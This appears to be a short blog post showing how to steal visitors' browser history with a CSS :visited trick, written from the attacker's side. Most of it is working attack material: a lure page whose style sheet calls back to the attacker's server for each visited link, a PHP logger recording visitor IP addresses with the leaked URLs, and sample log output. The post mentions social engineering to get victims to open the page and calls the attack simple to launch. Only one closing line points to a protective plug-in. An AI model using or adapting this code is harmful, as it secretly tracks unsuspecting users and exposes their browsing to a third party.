I initially thought you've got to have javascript enabled in order to steal user browser history (you are still not safe even if you disable javascript!). I was curious to find out how to do without javascripts. You can do a simple CSS trick to steal the browser history (an online example). The idea is quite simple. In your style sheet, you specify which URL's you want to track. Then you use some kind of a social engineering trick for the user to open your malicious page. For the user there is nothing visible, it is an innocuous html page; but it simply checks browser history and if the user had happened to have visited some of the links listed in the page, it sends a message back to the malicious server. Then the malicious server knows which links user visited.
For example,
This is a simple malicious page html page that I want to get a user to open:
<html>
<body>
<style>
span.s1 a:visited {
background:url(visited.php?t=http%3A//http.google.com);
}
span.s2 a:visited {
background:url(visited.php?t=http%3A//http.dailymirror.lk);
}
</style>
<span class="s1">
<a href="http://www.google.com">www.google.com</a>
</span>
<br/>
<span class="s2">
<a href="http://www.dailymirror.lk">www.dailymirror.lk</a>
</span>
</body>
</html>
And I have a small malicious php file which write to a txt if the user has visited a specific link:
<?php
$client = $_SERVER['REMOTE_ADDR'];
$fp = fopen("history.txt", "a");
$str = $client . " has accessed " . $_GET['t'] . "\n";
fwrite($fp, $str);
fclose($fp);
?>
The history.txt file has something like:
205.10.1.1 has accessed http://www.google.com
210.34.5.11 has accessed http://www.google.com
210.34.5.11 has accessed http://www.dailymirror.lk
You get the idea. It is quite simple to launch this attack.
Found that this plug-in from Stanford said to protect your browser from visited link based attacks. (Update: this plug-in is no longer maintained. Only has an xpi for FF 2.0)
No comments:
Post a Comment